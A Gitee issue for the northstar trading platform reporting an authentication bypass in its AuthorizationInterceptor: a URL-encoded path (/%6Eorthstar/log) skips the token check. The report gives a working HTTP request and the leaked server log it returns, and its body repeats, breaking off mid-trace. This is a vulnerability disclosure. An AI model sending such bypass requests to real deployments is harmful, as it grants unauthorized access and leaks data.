登录
注册
开源
企业版
高校版
搜索
帮助中心
使用条款
关于我们
开源
企业版
高校版
私有云
模力方舟
AI 队友
登录
注册
2025 Gitee 年度开源项目评选投票进行中,快为你的心仪项目助力!
代码拉取完成,页面将自动刷新
开源项目
>
企业应用
>
财务/金融/股票证券
&&
捐赠
捐赠前请先登录
取消
前往登录
扫描微信二维码支付
取消
支付完成
支付提示
将跳转至支付宝完成支付
确定
取消
Watch
不关注
关注所有动态
仅关注版本发行动态
关注但不提醒动态
643
Star
4.2K
Fork
1.9K
GVP
dromara
/
northstar
代码
Issues
2
Pull Requests
0
Wiki
统计
流水线
服务
JavaDoc
质量分析
Jenkins for Gitee
腾讯云托管
腾讯云 Serverless
悬镜安全
阿里云 SAE
Codeblitz
SBOM
我知道了,不再自动展开
更新失败,请稍后重试!
移除标识
内容风险标识
本任务被
标识为内容中包含有代码安全 Bug 、隐私泄露等敏感信息,仓库外成员不可访问
[Bug]: There is an Incorrect Access Control vulnerability in northstar
已完成
#ICCQ4E
张淇伊
创建于
2025-06-05 10:33
### 这个问题是否已经存在? - [x] 我已经搜索过现有的问题 (https://gitee.com/dromara/northstar/issues) ### 如何复现 1. version: <= v7.3.5 (commit 2ab1f621ac0a93e4a05b99f1430f9a1a3ebf0e8b) 2. problem: There is an authentication bypass vulnerability in northstar. An attacker can exploit this vulnerability to access `/northstar/*` API without any token. 3. source code analysis: - The affected source code class is `org.dromara.northstar.web.interceptor.AuthorizationInterceptor`, and the affected function is `preHandle`. In the filter code, use `request.getRequestURI()` to obtain the request path, and then determine whether the `path` startsWith `/northstar/auth/login` but not startWith `/northstar`, etc. If the condition is met, it will execute `return true` to bypass the Interceptor. Otherwise, it will block the current request.  - The problem lies in using `request.getRequestURI()` to obtain the request path. The path obtained by this function will not parse special symbols, but will be passed on directly, so you can use URL encoding to bypass it. - Taking one of the backend interfaces `/northstar/log` as an example, using `/%6Eorthstar/log` can make it bypass the `AuthorizationInterceptor`, and at the same time, it allows the log content leak. 4. reproduce the vulnerablitity ``` GET /%6Eorthstar/log?positionOffset=0&tailNumOfLines=100 HTTP/1.1 Host: 127.0.0.1:80 User-Agent: Apifox/1.0.0 (https://apifox.com) Accept: */* Host: 127.0.0.1:80 Connection: keep-alive Cookie: JSESSIONID=3423C5F9E5AC5521378700D5EB2E0665 ``` ### 预期结果 { "timestamp": 1749090153426, "status": 401, "error": "Unauthorized", "path": "/northstar/log" } ### 实际结果 { "status": 200, "message": null, "data": { "startPosition": 0, "endPosition": 31649, "linesOfLog": [ "2025-06-05T10:19:35.772+08:00 INFO 40545 --- [main] .s.d.r.c.RepositoryConfigurationDelegate : Bootstrapping Spring Data JPA repositories in DEFAULT mode.", "2025-06-05T10:19:35.802+08:00 INFO 40545 --- [main] .s.d.r.c.RepositoryConfigurationDelegate : Finished Spring Data repository scanning in 25 ms. Found 9 JPA repository interfaces.", "2025-06-05T10:19:36.151+08:00 INFO 40545 --- [main] o.d.n.config.SocketIOServerConfig : 自动装配SocketIOServerAutoConfiguration", "2025-06-05T10:19:36.151+08:00 WARN 40545 --- [main] trationDelegate$BeanPostProcessorChecker : Bean 'socketIOServerConfig' of type [org.dromara.northstar.config.SocketIOServerConfig$$SpringCGLIB$$0] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying). The currently created BeanPostProcessor [springAnnotationScanner] is declared through a non-static factory method on that class; consider declaring it as static instead.", "2025-06-05T10:19:36.201+08:00 INFO 40545 --- [main] c.c.socketio.SocketIOServer : Session store / pubsub factory used: MemoryStoreFactory (local session store only)", "2025-06-05T10:19:36.280+08:00 INFO 40545 --- [nioEventLoopGroup-2-1] c.c.socketio.SocketIOServer : SocketIO server started at port: 51688", "2025-06-05T10:19:36.281+08:00 WARN 40545 --- [main] trationDelegate$BeanPostProcessorChecker : Bean 'socketIOServer' of type [com.corundumstudio.socketio.SocketIOServer] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying). Is this bean getting eagerly injected into a currently created BeanPostProcessor [springAnnotationScanner]? Check the corresponding BeanPostProcessor declaration and its dependencies.", "2025-06-05T10:19:36.463+08:00 INFO 40545 --- [main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port 80 (http)", "2025-06-05T10:19:36.469+08:00 INFO 40545 --- [main] o.apache.catalina.core.StandardService : Starting service [Tomcat]", "2025-06-05T10:19:36.469+08:00 INFO 40545 --- [main] o.apache.catalina.core.StandardEngine : Starting Servlet engine: [Apache Tomcat/10.1.16]", "2025-06-05T10:19:36.501+08:00 INFO 40545 --- [main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext", "2025-06-05T10:19:36.502+08:00 INFO 40545 --- [main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 1142 ms", "2025-06-05T10:19:36.524+08:00 INFO 40545 --- [main] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Starting...", "2025-06-05T10:19:36.692+08:00 INFO 40545 --- [main] com.zaxxer.hikari.pool.HikariPool : HikariPool-1 - Added connection conn0: url=jdbc:h2:file:./data/storage user=SA", "2025-06-05T10:19:36.694+08:00 INFO 40545 --- [main] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Start completed.", "2025-06-05T10:19:36.700+08:00 INFO 40545 --- [main] o.s.b.a.h2.H2ConsoleAutoConfiguration : H2 console available at '/h2-console'. Database available at 'jdbc:h2:file:./data/storage'", "2025-06-05T10:19:36.706+08:00 INFO 40545 --- [main] org.dromara.northstar.config.AppConfig : 设置全局环境信息", "2025-06-05T10:19:37.061+08:00 INFO 40545 --- [main] org.ehcache.core.EhcacheManager : Cache 'bars' created in EhcacheManager.", "2025-06-05T10:19:37.077+08:00 INFO 40545 --- [main] org.ehcache.jsr107.Eh107CacheManager : Registering Ehcache MBean javax.cache:type=CacheStatistics,CacheManager=file./Users/racerz/Desktop/Auth/URLFuzz/benchmark/northstar/northstar-main/target/classes/ehcache.xml,Cache=bars", "2025-06-05T10:19:37.146+08:00 INFO 40545 --- [main] o.hibernate.jpa.internal.util.LogHelper : HHH000204: Processing PersistenceUnitInfo [name: default]", "2025-06-05T10:19:37.191+08:00 INFO 40545 --- [main] org.hibernate.Version : HHH000412: Hibernate ORM core version 6.3.1.Final", "2025-06-05T10:19:37.216+08:00 INFO 40545 --- [main] o.h.c.internal.RegionFactoryInitiator : HHH000026: Second-level cache disabled", "2025-06-05T10:19:37.390+08:00 INFO 40545 --- [main] o.s.o.j.p.SpringPersistenceUnitInfo : No LoadTimeWeaver setup: ignoring JPA class transformer", "2025-06-05T10:19:37.428+08:00 WARN 40545 --- [main] org.hibernate.orm.deprecation : HHH90000025: H2Dialect does not need to be specified explicitly using 'hibernate.dialect' (remove the property setting and it will be selected by default)", "2025-06-05T10:19:38.048+08:00 INFO 40545 --- [main] o.h.e.t.j.p.i.JtaPlatformInitiator : HHH000489: No JTA platform available (set 'hibernate.transaction.jta.platform' to enable JTA platform integration)", "2025-06-05T10:19:38.069+08:00 INFO 40545 --- [main] j.LocalContainerEntityManagerFactoryBean : Initialized JPA EntityManagerFactory for persistence unit 'default'", "2025-06-05T10:19:38.076+08:00 INFO 40545 --- [main] o.dromara.northstar.config.CacheConfig : 启用缓存管理", "2025-06-05T10:19:38.088+08:00 INFO 40545 --- [main] o.d.n.event.DisruptorFastEventEngine : 启动事件引擎", "2025-06-05T10:19:38.375+08:00 INFO 40545 --- [main] c.c.s.a.SpringAnnotationScanner : broadcastEventHandler bean listeners added", "2025-06-05T10:19:38.682+08:00 WARN 40545 --- [main] JpaBaseConfiguration$JpaWebConfiguration : spring.jpa.open-in-view is enabled by default. Therefore, database queries may be performed during view rendering. Explicitly configure spring.jpa.open-in-view to disable this warning", "2025-06-05T10:19:38.700+08:00 INFO 40545 --- [main] o.s.b.a.w.s.WelcomePageHandlerMapping : Adding welcome page: class path resource [static/index.html]", "2025-06-05T10:19:38.970+08:00 INFO 40545 --- [main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat started on port 80 (http) with context path ''", "2025-06-05T10:19:38.980+08:00 INFO 40545 --- [main] o.d.northstar.NorthstarApplication : Started NorthstarApplication in 4.005 seconds (process running for 4.551)", "2025-06-05T10:19:38.982+08:00 INFO 40545 --- [main] o.d.n.gateway.GatewayMetaProvider : 注册 [SIM] 渠道元信息", "2025-06-05T10:19:38.982+08:00 INFO 40545 --- [main] o.d.n.gateway.GatewayMetaProvider : 注册 [PLAYBACK] 渠道元信息", "2025-06-05T10:19:38.983+08:00 INFO 40545 --- [main] o.d.n.gateway.playback.PlaybackLoader : 加载回测合约", "2025-06-05T10:19:41.130+08:00 INFO 40545 --- [main] o.d.n.web.service.GatewayService : 开始加载网关", "2025-06-05T10:19:41.182+08:00 INFO 40545 --- [main] o.d.n.web.service.GatewayService : 等待网关合约加载", "2025-06-05T10:19:51.201+08:00 INFO 40545 --- [main] o.d.n.web.service.GatewayService : 网关加载完毕", "2025-06-05T10:19:51.203+08:00 INFO 40545 --- [main] o.d.northstar.web.service.ModuleService : 开始加载模组", "2025-06-05T10:19:51.212+08:00 INFO 40545 --- [main] o.d.northstar.web.service.ModuleService : 模组加载完毕", "2025-06-05T10:19:51.213+08:00 INFO 40545 --- [main] org.dromara.northstar.config.AppConfig : Version: 7.3.5, Build Time: 2025-06-05T10:05:04.360+08:00", "2025-06-05T10:20:00.187+08:00 INFO 40545 --- [tomcat-handler-0] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring DispatcherServlet 'dispatcherServlet'", "2025-06-05T10:20:00.188+08:00 INFO 40545 --- [tomcat-handler-0] o.s.web.servlet.DispatcherServlet : Initializing Servlet 'dispatcherServlet'", "2025-06-05T10:20:00.194+08:00 INFO 40545 --- [tomcat-handler-0] o.s.web.servlet.DispatcherServlet : Completed initialization in 5 ms", "2025-06-05T10:20:00.231+08:00 WARN 40545 --- [tomcat-handler-0] o.d.n.w.i.AuthorizationInterceptor : token校验失败,IP:127.0.0.1", "2025-06-05T10:20:11.140+08:00 WARN 40545 --- [tomcat-handler-2] o.d.n.w.i.AuthorizationInterceptor : token校验失败,IP:127.0.0.1", "2025-06-05T10:21:40.125+08:00 ERROR 40545 --- [tomcat-handler-4] o.d.n.w.r.common.CommonControllerAdvice : Optional long parameter 'positionOffset' is present but cannot be translated into a null value due to being declared as a primitive type. Consider declaring it as object wrapper for the corresponding primitive type.", "java.lang.IllegalStateException: Optional long parameter 'positionOffset' is present but cannot be translated into a null value due to being declared as a primitive type. Consider declaring it as object wrapper for the corresponding primitive type.", "\tat org.springframework.web.method.annotation.AbstractNamedValueMethodArgumentResolver.handleNullValue(AbstractNamedValueMethodArgumentResolver.java:269)", "\tat org.springframework.web.method.annotation.AbstractNamedValueMethodArgumentResolver.resolveArgument(AbstractNamedValueMethodArgumentResolver.java:127)", "\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)", "\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:218)", "\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:171)", "\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:118)", "\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:917)", "\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:829)", "\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)", "\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1089)", "\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:979)", "\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1014)", "\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:903)", "\tat jakarta.servlet.http.HttpServlet.service(HttpServlet.java:564)", "\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:885)", "\tat jakarta.servlet.http.HttpServlet.service(HttpServlet.java:658)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:205)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.springframework.web.filter.CorsFilter.doFilterInternal(CorsFilter.java:91)", "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)", "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)", "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)", "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:167)", "\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:90)", "\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:482)", "\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:115)", "\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:93)", "\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)", "\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:340)", "\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:391)", "\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)", "\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896)", "\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1744)", "\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)", "\tat java.base/java.lang.VirtualThread.run(VirtualThread.java:329)", "2025-06-05T10:22:33.423+08:00 WARN 40545 --- [tomcat-handler-7] o.d.n.w.i.AuthorizationInterceptor : token校验失败,IP:127.0.0.1" ] } } ### 截图或视频 - nomal request  - attack request  ### 问题版本号 v7.3.5 (master branch)
### 这个问题是否已经存在? - [x] 我已经搜索过现有的问题 (https://gitee.com/dromara/northstar/issues) ### 如何复现 1. version: <= v7.3.5 (commit 2ab1f621ac0a93e4a05b99f1430f9a1a3ebf0e8b) 2. problem: There is an authentication bypass vulnerability in northstar. An attacker can exploit this vulnerability to access `/northstar/*` API without any token. 3. source code analysis: - The affected source code class is `org.dromara.northstar.web.interceptor.AuthorizationInterceptor`, and the affected function is `preHandle`. In the filter code, use `request.getRequestURI()` to obtain the request path, and then determine whether the `path` startsWith `/northstar/auth/login` but not startWith `/northstar`, etc. If the condition is met, it will execute `return true` to bypass the Interceptor. Otherwise, it will block the current request.  - The problem lies in using `request.getRequestURI()` to obtain the request path. The path obtained by this function will not parse special symbols, but will be passed on directly, so you can use URL encoding to bypass it. - Taking one of the backend interfaces `/northstar/log` as an example, using `/%6Eorthstar/log` can make it bypass the `AuthorizationInterceptor`, and at the same time, it allows the log content leak. 4. reproduce the vulnerablitity ``` GET /%6Eorthstar/log?positionOffset=0&tailNumOfLines=100 HTTP/1.1 Host: 127.0.0.1:80 User-Agent: Apifox/1.0.0 (https://apifox.com) Accept: */* Host: 127.0.0.1:80 Connection: keep-alive Cookie: JSESSIONID=3423C5F9E5AC5521378700D5EB2E0665 ``` ### 预期结果 { "timestamp": 1749090153426, "status": 401, "error": "Unauthorized", "path": "/northstar/log" } ### 实际结果 { "status": 200, "message": null, "data": { "startPosition": 0, "endPosition": 31649, "linesOfLog": [ "2025-06-05T10:19:35.772+08:00 INFO 40545 --- [main] .s.d.r.c.RepositoryConfigurationDelegate : Bootstrapping Spring Data JPA repositories in DEFAULT mode.", "2025-06-05T10:19:35.802+08:00 INFO 40545 --- [main] .s.d.r.c.RepositoryConfigurationDelegate : Finished Spring Data repository scanning in 25 ms. Found 9 JPA repository interfaces.", "2025-06-05T10:19:36.151+08:00 INFO 40545 --- [main] o.d.n.config.SocketIOServerConfig : 自动装配SocketIOServerAutoConfiguration", "2025-06-05T10:19:36.151+08:00 WARN 40545 --- [main] trationDelegate$BeanPostProcessorChecker : Bean 'socketIOServerConfig' of type [org.dromara.northstar.config.SocketIOServerConfig$$SpringCGLIB$$0] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying). The currently created BeanPostProcessor [springAnnotationScanner] is declared through a non-static factory method on that class; consider declaring it as static instead.", "2025-06-05T10:19:36.201+08:00 INFO 40545 --- [main] c.c.socketio.SocketIOServer : Session store / pubsub factory used: MemoryStoreFactory (local session store only)", "2025-06-05T10:19:36.280+08:00 INFO 40545 --- [nioEventLoopGroup-2-1] c.c.socketio.SocketIOServer : SocketIO server started at port: 51688", "2025-06-05T10:19:36.281+08:00 WARN 40545 --- [main] trationDelegate$BeanPostProcessorChecker : Bean 'socketIOServer' of type [com.corundumstudio.socketio.SocketIOServer] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying). Is this bean getting eagerly injected into a currently created BeanPostProcessor [springAnnotationScanner]? Check the corresponding BeanPostProcessor declaration and its dependencies.", "2025-06-05T10:19:36.463+08:00 INFO 40545 --- [main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port 80 (http)", "2025-06-05T10:19:36.469+08:00 INFO 40545 --- [main] o.apache.catalina.core.StandardService : Starting service [Tomcat]", "2025-06-05T10:19:36.469+08:00 INFO 40545 --- [main] o.apache.catalina.core.StandardEngine : Starting Servlet engine: [Apache Tomcat/10.1.16]", "2025-06-05T10:19:36.501+08:00 INFO 40545 --- [main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext", "2025-06-05T10:19:36.502+08:00 INFO 40545 --- [main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 1142 ms", "2025-06-05T10:19:36.524+08:00 INFO 40545 --- [main] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Starting...", "2025-06-05T10:19:36.692+08:00 INFO 40545 --- [main] com.zaxxer.hikari.pool.HikariPool : HikariPool-1 - Added connection conn0: url=jdbc:h2:file:./data/storage user=SA", "2025-06-05T10:19:36.694+08:00 INFO 40545 --- [main] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Start completed.", "2025-06-05T10:19:36.700+08:00 INFO 40545 --- [main] o.s.b.a.h2.H2ConsoleAutoConfiguration : H2 console available at '/h2-console'. Database available at 'jdbc:h2:file:./data/storage'", "2025-06-05T10:19:36.706+08:00 INFO 40545 --- [main] org.dromara.northstar.config.AppConfig : 设置全局环境信息", "2025-06-05T10:19:37.061+08:00 INFO 40545 --- [main] org.ehcache.core.EhcacheManager : Cache 'bars' created in EhcacheManager.", "2025-06-05T10:19:37.077+08:00 INFO 40545 --- [main] org.ehcache.jsr107.Eh107CacheManager : Registering Ehcache MBean javax.cache:type=CacheStatistics,CacheManager=file./Users/racerz/Desktop/Auth/URLFuzz/benchmark/northstar/northstar-main/target/classes/ehcache.xml,Cache=bars", "2025-06-05T10:19:37.146+08:00 INFO 40545 --- [main] o.hibernate.jpa.internal.util.LogHelper : HHH000204: Processing PersistenceUnitInfo [name: default]", "2025-06-05T10:19:37.191+08:00 INFO 40545 --- [main] org.hibernate.Version : HHH000412: Hibernate ORM core version 6.3.1.Final", "2025-06-05T10:19:37.216+08:00 INFO 40545 --- [main] o.h.c.internal.RegionFactoryInitiator : HHH000026: Second-level cache disabled", "2025-06-05T10:19:37.390+08:00 INFO 40545 --- [main] o.s.o.j.p.SpringPersistenceUnitInfo : No LoadTimeWeaver setup: ignoring JPA class transformer", "2025-06-05T10:19:37.428+08:00 WARN 40545 --- [main] org.hibernate.orm.deprecation : HHH90000025: H2Dialect does not need to be specified explicitly using 'hibernate.dialect' (remove the property setting and it will be selected by default)", "2025-06-05T10:19:38.048+08:00 INFO 40545 --- [main] o.h.e.t.j.p.i.JtaPlatformInitiator : HHH000489: No JTA platform available (set 'hibernate.transaction.jta.platform' to enable JTA platform integration)", "2025-06-05T10:19:38.069+08:00 INFO 40545 --- [main] j.LocalContainerEntityManagerFactoryBean : Initialized JPA EntityManagerFactory for persistence unit 'default'", "2025-06-05T10:19:38.076+08:00 INFO 40545 --- [main] o.dromara.northstar.config.CacheConfig : 启用缓存管理", "2025-06-05T10:19:38.088+08:00 INFO 40545 --- [main] o.d.n.event.DisruptorFastEventEngine : 启动事件引擎", "2025-06-05T10:19:38.375+08:00 INFO 40545 --- [main] c.c.s.a.SpringAnnotationScanner : broadcastEventHandler bean listeners added", "2025-06-05T10:19:38.682+08:00 WARN 40545 --- [main] JpaBaseConfiguration$JpaWebConfiguration : spring.jpa.open-in-view is enabled by default. Therefore, database queries may be performed during view rendering. Explicitly configure spring.jpa.open-in-view to disable this warning", "2025-06-05T10:19:38.700+08:00 INFO 40545 --- [main] o.s.b.a.w.s.WelcomePageHandlerMapping : Adding welcome page: class path resource [static/index.html]", "2025-06-05T10:19:38.970+08:00 INFO 40545 --- [main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat started on port 80 (http) with context path ''", "2025-06-05T10:19:38.980+08:00 INFO 40545 --- [main] o.d.northstar.NorthstarApplication : Started NorthstarApplication in 4.005 seconds (process running for 4.551)", "2025-06-05T10:19:38.982+08:00 INFO 40545 --- [main] o.d.n.gateway.GatewayMetaProvider : 注册 [SIM] 渠道元信息", "2025-06-05T10:19:38.982+08:00 INFO 40545 --- [main] o.d.n.gateway.GatewayMetaProvider : 注册 [PLAYBACK] 渠道元信息", "2025-06-05T10:19:38.983+08:00 INFO 40545 --- [main] o.d.n.gateway.playback.PlaybackLoader : 加载回测合约", "2025-06-05T10:19:41.130+08:00 INFO 40545 --- [main] o.d.n.web.service.GatewayService : 开始加载网关", "2025-06-05T10:19:41.182+08:00 INFO 40545 --- [main] o.d.n.web.service.GatewayService : 等待网关合约加载", "2025-06-05T10:19:51.201+08:00 INFO 40545 --- [main] o.d.n.web.service.GatewayService : 网关加载完毕", "2025-06-05T10:19:51.203+08:00 INFO 40545 --- [main] o.d.northstar.web.service.ModuleService : 开始加载模组", "2025-06-05T10:19:51.212+08:00 INFO 40545 --- [main] o.d.northstar.web.service.ModuleService : 模组加载完毕", "2025-06-05T10:19:51.213+08:00 INFO 40545 --- [main] org.dromara.northstar.config.AppConfig : Version: 7.3.5, Build Time: 2025-06-05T10:05:04.360+08:00", "2025-06-05T10:20:00.187+08:00 INFO 40545 --- [tomcat-handler-0] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring DispatcherServlet 'dispatcherServlet'", "2025-06-05T10:20:00.188+08:00 INFO 40545 --- [tomcat-handler-0] o.s.web.servlet.DispatcherServlet : Initializing Servlet 'dispatcherServlet'", "2025-06-05T10:20:00.194+08:00 INFO 40545 --- [tomcat-handler-0] o.s.web.servlet.DispatcherServlet : Completed initialization in 5 ms", "2025-06-05T10:20:00.231+08:00 WARN 40545 --- [tomcat-handler-0] o.d.n.w.i.AuthorizationInterceptor : token校验失败,IP:127.0.0.1", "2025-06-05T10:20:11.140+08:00 WARN 40545 --- [tomcat-handler-2] o.d.n.w.i.AuthorizationInterceptor : token校验失败,IP:127.0.0.1", "2025-06-05T10:21:40.125+08:00 ERROR 40545 --- [tomcat-handler-4] o.d.n.w.r.common.CommonControllerAdvice : Optional long parameter 'positionOffset' is present but cannot be translated into a null value due to being declared as a primitive type. Consider declaring it as object wrapper for the corresponding primitive type.", "java.lang.IllegalStateException: Optional long parameter 'positionOffset' is present but cannot be translated into a null value due to being declared as a primitive type. Consider declaring it as object wrapper for the corresponding primitive type.", "\tat org.springframework.web.method.annotation.AbstractNamedValueMethodArgumentResolver.handleNullValue(AbstractNamedValueMethodArgumentResolver.java:269)", "\tat org.springframework.web.method.annotation.AbstractNamedValueMethodArgumentResolver.resolveArgument(AbstractNamedValueMethodArgumentResolver.java:127)", "\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)", "\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:218)", "\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:171)", "\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:118)", "\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:917)", "\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:829)", "\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)", "\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1089)", "\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:979)", "\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1014)", "\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:903)", "\tat jakarta.servlet.http.HttpServlet.service(HttpServlet.java:564)", "\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:885)", "\tat jakarta.servlet.http.HttpServlet.service(HttpServlet.java:658)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:205)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.springframework.web.filter.CorsFilter.doFilterInternal(CorsFilter.java:91)", "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)", "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)", "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)", "\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116)", "\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:174)", "\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:149)", "\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:167)", "\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:90)", "\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:482)", "\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:115)", "\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:93)", "\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)", "\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:340)", "\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:391)", "\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)", "\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896)", "\tat 